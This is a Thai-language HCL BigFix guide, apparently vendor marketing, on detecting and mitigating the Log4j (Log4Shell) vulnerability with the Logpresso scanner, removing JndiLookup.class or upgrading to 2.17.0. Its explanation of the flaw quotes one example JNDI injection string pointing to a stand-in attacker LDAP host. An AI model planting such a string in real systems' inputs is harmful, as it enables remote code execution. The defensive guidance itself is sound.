คู่มือHCL BigFix สำหรับการตอบโต้ช่องโหว่ของ Log4J
- เกือบทุกองค์กรหรือองค์กรระดับโลกกำลังเผชิญกับแรงกดดันในการแก้ไขสิ่งที่ผู้เชี่ยวชาญเรียกว่าช่องโหว่ซอฟต์แวร์ที่ร้ายแรงที่สุดจุดหนึ่งในหน่วยความจำล่าสุด เป็นแบบกว้างและง่ายต่อการใช้ประโยชน์
- ข้อบกพร่องในซอฟต์แวร์ Log4j อาจทำให้แฮ็กเกอร์เข้าถึงระบบคอมพิวเตอร์ได้โดยอิสระ และได้รับแจ้งคำเตือนอย่างเร่งด่วนจากหน่วยงานความปลอดภัยทางไซเบอร์ของรัฐบาลสหรัฐฯ
- การโจมตีเกิดขึ้นน้อยกว่าหนึ่งวันหลังจากการรายงาน ในปัจจุบัน ช่องโหว่นี้มีคะแนนพื้นฐานของเมทริกซ์ความเสี่ยงที่ 10 และถูกระบุว่าเป็นระดับความรุนแรงที่สำคัญโดย GitHub
Log4j มีอยู่ทุกที่ Apache Log4j เป็นไลบรารี Java ยอดนิยมที่พัฒนาและดูแลโดยมูลนิธิ Apache ไลบรารี Log4j ถูกนำมาใช้กันอย่างแพร่หลายและใช้ในผลิตภัณฑ์ซอฟต์แวร์เชิงพาณิชย์และโอเพ่นซอร์สจำนวนมากเป็นเฟรมเวิร์กการบันทึกสำหรับ Java มีการประเมินว่าอุปกรณ์หลายร้อยล้านเครื่องตกอยู่ในความเสี่ยง และอาจรวมถึงอุปกรณ์ของรัฐบาลและอุปกรณ์เชิงพาณิชย์ รวมถึงอุปกรณ์สำหรับผู้บริโภคตามบ้าน เนื่องจาก Apache Log4j มีการใช้งานอย่างแพร่หลายทั่วทั้งระบบนิเวศการประมวลผลของโลก นอกจากนี้ อุปกรณ์ที่ได้รับผลกระทบแต่ละเครื่องอาจมีสถานที่หลายสิบหรือหลายร้อยแห่งที่มีรหัสที่มีช่องโหว่อยู่ เนื่องจากการบันทึกเป็นการดำเนินการทั่วไปในการประมวลผลทั้งหมด ทำไมมันร้ายแรงจัง?
ช่องโหว่ Log4j นั้นสำคัญไฉนเพราะมันสามารถถูกโจมตีจากระยะไกลโดยฝ่ายตรงข้ามที่ไม่ผ่านการตรวจสอบสิทธิ์เพื่อรันโค้ดโดยอำเภอใจ (เรียกว่าการเรียกใช้โค้ดจากระยะไกล: RCE) ระดับความสำคัญของช่องโหว่นั้นได้คะแนน 10/10 ในระบบให้คะแนนช่องโหว่ทั่วไป (CVSS) ของ MITRE.org ซึ่งระบุว่าช่องโหว่นั้นรุนแรงเพียงใด ช่องโหว่ RCE สามารถใช้ประโยชน์ได้ขึ้นอยู่กับวิธีจัดการกับข้อความบันทึกโดยรหัส log4j หากผู้โจมตีส่งข้อความที่มีสตริง เช่น ${jndi:ldap://dirtyLDAP.com/X}) ซึ่งอาจส่งผลให้มีการโหลดคลาสโค้ดภายนอกหรือการค้นหาข้อความและการดำเนินการของโค้ดภายนอก (ที่เป็นอันตราย) จะนำไปสู่ RCE ซึ่งผู้คุกคามสามารถรันโค้ดที่เป็นอันตรายโดยพลการโดยไม่ต้องตรวจสอบสิทธิ์
สรุปนี่คือช่องโหว่ขนาดใหญ่ที่ส่งผลกระทบต่ออุปกรณ์หลายร้อยล้านเครื่องทั่วทั้งระบบนิเวศการประมวลผลทั่วโลก และการระบุตำแหน่งโค้ดที่เปราะบางเหล่านี้และการแก้ไขเป็นสิ่งที่มีความสำคัญและเร่งด่วนที่สุด โชคดีที่ BigFix ได้รับการออกแบบมาเพื่อช่วยในสถานการณ์เหล่านี้
เรากำลังทำงานร่วมกับลูกค้า ผู้เชี่ยวชาญด้านความปลอดภัย และฝ่ายปฏิบัติการด้านไอทีเพื่อสร้างเนื้อหาการระบุช่องโหว่และการแก้ไขที่จะช่วยคุณระบุและแก้ไขผลกระทบ Log4j ในสภาพแวดล้อมของคุณ
สถานการณ์ที่เรากำลังเผชิญอยู่นั้นลื่นไหล และเรากำลังตอบสนองแบบเรียลไทม์ต่อช่องโหว่รูปแบบใหม่ๆ ตามที่ได้มีการประกาศไว้เช่นกัน เพื่อคอยให้คำแนะนำล่าสุดแก่คุณ ลูกค้าของเรา ให้เป็นปัจจุบันและเป็นปัจจุบัน เราประเมินและใช้คำแนะนำที่ดีที่สุดของ Apache ผู้เชี่ยวชาญด้านความปลอดภัย และแพตช์จากผู้จำหน่ายซอฟต์แวร์อย่างต่อเนื่องตลอดจนโซลูชันการประดิษฐ์ที่ทำงานร่วมกับผลิตภัณฑ์ BigFix และชุดเครื่องมือ
เมื่อคุณใช้โซลูชันเหล่านี้ องค์กรของคุณมีหน้าที่ในการทดสอบโซลูชันใดๆ ที่มีให้ในฐานระบบที่กว้างที่สุดที่มีอยู่ รวมถึงระบบปฏิบัติการต่างๆ โซลูชันการจัดเก็บข้อมูล และรายการแอปพลิเคชัน ตระหนักว่าขั้นตอนการแก้ไขบางอย่างอาจสร้างความเสียหายให้กับแอปพลิเคชันในระบบนิเวศของคุณโดยพิจารณาจากประเภทของการลดหย่อนที่กำลังปรับใช้ ใช้ความระมัดระวัง ทดสอบในสภาพแวดล้อมที่มีขนาดเล็กกว่าและมีการควบคุม และเตรียมพร้อมที่จะมีแผนการฟื้นฟูหากสิ่งต่างๆ หายไป
- เริ่มต้นในกลุ่มเล็ก ๆ และดูผลกระทบของระบบ เมื่อสแกนกลุ่มใหญ่ ให้ใช้ตัวเลือก ‘Stagger Action Start Times’ เพื่อหลีกเลี่ยงไม่ให้เซิร์ฟเวอร์ทำงานหนักเกินไปหรือระบบจัดเก็บข้อมูลที่ใช้ร่วมกัน
- ประเมินผลลัพธ์และกำหนดจุดที่ต้องการบรรเทา
- ดำเนินการบรรเทาปัญหาโดยใช้หนึ่งในโปรแกรมแก้ไขด่วนที่อ้างอิงด้านล่าง หรือใช้โปรแกรมแก้ไขของผู้จำหน่าย หรือดำเนินการแก้ไขด้วยตนเอง
จะใช้ BigFix เพื่อสแกนหาช่องโหว่ของ Log4j ได้อย่างไร
ขั้นตอนการสแกนทั่วไปคือ:
- ดาวน์โหลด นำเข้า และเปิดใช้งานการวิเคราะห์เพื่อรายงานผลการสแกน Log4j
- ดาวน์โหลดและนำเข้างาน Log4j-scan อย่างน้อยหนึ่งรายการ
- ดำเนินการสแกนที่เหมาะสมกับสภาพแวดล้อมของคุณเพื่อรวบรวมผลลัพธ์
ฉันควรใช้การสแกนแบบใด
ขณะนี้เราได้พัฒนาการสแกนที่แตกต่างกันห้าแบบและการแก้ไขแก้ไขที่แตกต่างกันหกแบบ รายงานทั้งหมดให้ผลลัพธ์ในลักษณะเดียวกัน และสร้างผลลัพธ์เดียวกันทั้งหมด คุณควรใช้อันไหน?
การสแกนไบนารีเฉพาะระบบปฏิบัติการ
การสแกนทั้งสามนี้จะดาวน์โหลดไบนารีที่สร้างไว้ล่วงหน้าสำหรับระบบปฏิบัติการบางชุด สิ่งเหล่านี้อาจมีปัญหาหากคุณไม่ได้ติดตั้งข้อกำหนดเบื้องต้นบางอย่างไว้ รวมถึง Visual C++ Runtime บน Windows หรือเวอร์ชัน glibc เฉพาะบน Linux
Logpressso Log4j-scan เวอร์ชันล่าสุดคือ “สแตติกคอมไพล์” ซึ่งช่วยลดปัญหาความเข้ากันได้เหล่านี้ แต่อาจไม่สามารถขจัดปัญหาทั้งหมดได้ หากคุณต้องการดาวน์โหลดที่เล็กที่สุด และระบบปฏิบัติการของคุณรองรับการสแกนไบนารีเหล่านี้ อย่าลังเลที่จะใช้ หากคุณพบปัญหาความเข้ากันได้ ให้เปลี่ยนไปใช้การสแกนแบบ Java ด้านล่าง
>>Logpresso Scanner – Linux
>>Logpresso Scanner – Mac
>>Logpresso Scanner – Windows
สแกนเนอร์ที่ใช้ Java พร้อมการติดตั้ง Java ที่มีอยู่
หากระบบของคุณติดตั้ง Java ไว้แล้ว และอย่างน้อยต้องมี JRE 7 คุณอาจใช้การสแกน “Universal Java” ซึ่งให้ความเข้ากันได้ที่หลากหลายที่สุด สามารถจัดการระบบปฏิบัติการจำนวนมากที่เราไม่ได้สร้างการดาวน์โหลด JRE ที่เฉพาะเจาะจง เช่น Linux 32 บิต Solaris AIX และแม้แต่ Raspbian
>>Logpresso Scanner – สากล
สแกนเนอร์ที่ใช้ Java พร้อม JRE . ที่ดาวน์โหลด
สำหรับระบบที่ไม่ได้ติดตั้ง Java หรือ Java เก่าเกินไปที่จะเรียกใช้ Logpresso Log4j-scan เรามีงานอย่างต่อเนื่องใน Task ที่ดาวน์โหลด Java Runtime ชั่วคราวเพื่อเรียกใช้งานเครื่องสแกน ขณะนี้เราให้บริการดาวน์โหลดสำหรับ Windows รุ่น 32 บิต, Windows 64 บิต, Linux และ Mac 64 บิต เราจะมุ่งเน้นการทำงานนี้ในอีกไม่กี่วันข้างหน้าเพื่อเพิ่มรันไทม์ Java เพิ่มเติม ลินุกซ์ 32 บิต, AIX, Solaris และ HP-UX มีไว้สำหรับใช้งาน
HCL BigFix กำลังแนะนำเครื่องสแกน Logpresso ฟรีสำหรับการสอบสวนซอฟต์แวร์ของคุณแบบตรงเป้าหมายและเชิงลึก Logpresso คืออะไร เหตุใด BigFix จึงใช้ประโยชน์จากมัน
- Logpresso เป็นบริษัทด้านความปลอดภัยทางไซเบอร์และการวิเคราะห์ข้อมูลที่ตั้งอยู่ในเกาหลีใต้
- เครื่องสแกน Logpresso Log4j เป็นเครื่องสแกนที่ใช้จาวาแบบโอเพนซอร์ส มีให้ใช้งานบน GitHub พัฒนาโดยทีมเทคนิคของ Logpresso และเปิดให้ชุมชนความปลอดภัยทางไซเบอร์ใช้งานได้ฟรี
ก. เครื่องสแกน Logpresso สามารถค้นหาได้ไม่เฉพาะในไฟล์ .jar เท่านั้น แต่ยังค้นหาในไฟล์บีบอัดที่มีการบีบอัด ซึ่งรวมถึงไฟล์ .ear, .war ซึ่งหมายถึงผลการสแกนที่สมบูรณ์ยิ่งขึ้น
ข. เพื่อประโยชน์ต่อลูกค้าของเรา ทีมผลิตภัณฑ์ BigFix ได้สร้างเนื้อหาระบบอัตโนมัติที่ปรับแต่งเองสำหรับ logpresso ที่ขยายประสิทธิภาพในการค้นหาอินสแตนซ์ log4j ในสภาพแวดล้อมแอปพลิเคชันของคุณ
ค. ไม่มีเหตุผลใดที่คุณไม่สามารถใช้เครื่องสแกนที่ดีอื่น ๆ ได้ (เช่น เครื่องสแกนที่คุณเขียนเอง เครื่องสแกนหาได้จากแหล่งอื่น ฯลฯ)
โปรดจำไว้ว่า BigFix ทำหน้าที่เป็นตัวคูณแรงสำหรับ Logpresso หรือเครื่องสแกนหรือรหัสการแก้ไขอื่นๆ โดยให้คุณปรับขนาดการสแกนและการแก้ไขในอุปกรณ์หลายหมื่นเครื่อง ระบบปฏิบัติการหลายเครื่อง และฮาร์ดแวร์ที่แตกต่างกัน
ควรใช้ BigFix เพื่อทำการแก้ไขอย่างไรก่อนที่แพตช์จะพร้อมใช้งานจากผู้จำหน่ายแอปพลิเคชัน
BigFix มีชุดงานการแก้ไขตามผลลัพธ์ของการสแกน Logpresso Log4j การใช้งานทั้งหมดนี้เป็นความเสี่ยงของคุณเอง ทดสอบ. เป็นการยากสำหรับเราที่จะคาดเดาว่าแอปพลิเคชันใดที่อาจใช้งานไม่ได้จากการแก้ไขใดๆ เหล่านี้ในการตั้งค่าของคุณ อย่างไรก็ตาม ด้วยความรุนแรงของปัญหาเหล่านี้ เรารู้สึกว่าการให้ตัวเลือกต่างๆ เป็นสิ่งสำคัญ ในขณะที่เราทุกคนรอแพตช์จากผู้จำหน่ายซอฟต์แวร์แต่ละราย
แบ่งออกเป็นสองประเภท:
-
Logpresso Log4j-สแกนแก้ไข
ยูทิลิตี้การสแกน Logpresso Log4j สามารถดำเนินการแก้ไขบางอย่างได้ โดยเฉพาะอย่างยิ่ง จะเปิดไฟล์ log4j-core-2.x.jar และลบ JndiLookup.class ออกจากไฟล์ โดยทำตามคำแนะนำที่แนะนำที่หน้าความปลอดภัยของ Apache การดำเนินการนี้ช่วยบรรเทา CVE ที่แย่ที่สุด แต่อาจไม่บรรเทาช่องโหว่ที่อิงจากการปฏิเสธบริการล่าสุด ถึงกระนั้น นี่อาจเป็นขั้นตอนที่มีประสิทธิภาพมากในการดำเนินการเพื่อให้การป้องกันสูงสุดในขณะที่ยังคงความเข้ากันได้แบบย้อนหลังได้ดีที่สุดกับแอปพลิเคชันที่มีอยู่
สำหรับการสแกน Logpresso แต่ละครั้ง เรามีงานบรรเทาผลกระทบ:
การแก้ไข Logpresso – การแก้ไข Windows
Logpresso – การแก้ไข Linux
Logpresso – การแก้ไข Mac
Logpresso – Java –
การแก้ไข Logpresso สากล- Java – ด้วย JRE ชั่วคราว -
og4j-core-2.17.0.jar เปลี่ยน
นอกจากนี้ เราจัดเตรียมงานที่แทนที่จะแก้ไข Log4j-core จะแทนที่ไฟล์ Log4j-core- 2.x.jar ด้วยเวอร์ชัน 2.17.0 ล่าสุด การดำเนินการนี้จะปิด CVE ที่รู้จักทั้งหมด แต่มีแนวโน้มที่จะทำให้เกิดปัญหาความเข้ากันได้กับแอปพลิเคชันที่ขึ้นอยู่กับ Log4j
งานนี้แยกวิเคราะห์บันทึกเอาต์พุตของงาน Logpresso Log4j-scan ก่อนหน้า และแทนที่ไฟล์ Log4j-core-2.x.jar หากเป็นไปได้
เมื่อเราแทนที่ไฟล์ เราจะเก็บชื่อไฟล์ของเวอร์ชันดั้งเดิมไว้ ซึ่งสามารถช่วยลดปัญหาความเข้ากันได้ ไฟล์ต้นฉบับถูกสำรองไว้เพื่อให้สามารถกู้คืนได้ในภายหลังหากจำเป็น
ข้อจำกัด:
ก. ไม่ลงมาภายในไฟล์ JAR, WAR, EAR4 ที่ฝังไว้ แทนที่ Log4j-core- 2.x.jar ซึ่งเข้าถึงได้โดยตรงในระบบไฟล์เท่านั้น
ข. ไม่ได้แทนที่เวอร์ชัน Log4j 1.x Log4j Mitigation – แทนที่ Log4j ด้วย2.17.02
การดำเนินงานด้านไอทีมีความสำคัญต่อการเอาชนะสิ่งนี้ BigFix เป็นเครื่องมือที่จำเป็นสำหรับการดำเนินงานด้านไอที
BigFix จะทำการค้นหา จัดการ และแก้ไขอุปกรณ์ปลายทางทั้งหมดโดยอัตโนมัติ ไม่ว่าจะเป็นในสถานที่ อุปกรณ์เคลื่อนที่ เสมือน หรือในระบบคลาวด์ โดยไม่คำนึงถึงระบบปฏิบัติการ ตำแหน่ง หรือการเชื่อมต่อ BigFix Insights for Vulnerability Remediation ผสานรวมกับโซลูชันการจัดการช่องโหว่ชั้นนำ เช่น Tenable เพื่อแก้ไขช่องโหว่เช่น Log4j ได้เร็วกว่าโซลูชันอื่นๆ ในตลาด
ด้วย BigFix คุณสามารถจัดการทุกปลายทางได้ ทั้งในปัจจุบันและอนาคต
BigFix ได้มอบเครื่องมือพิเศษให้กับลูกค้าเพื่อช่วยในการค้นหา log4j ไม่ว่าจะอยู่ที่ใดในสภาพแวดล้อม รวมถึงระบบไฟล์ในระบบปฏิบัติการเกือบ 100 เวอร์ชัน
ลอง BigFix วันนี้! ติดต่อเรา KTNBS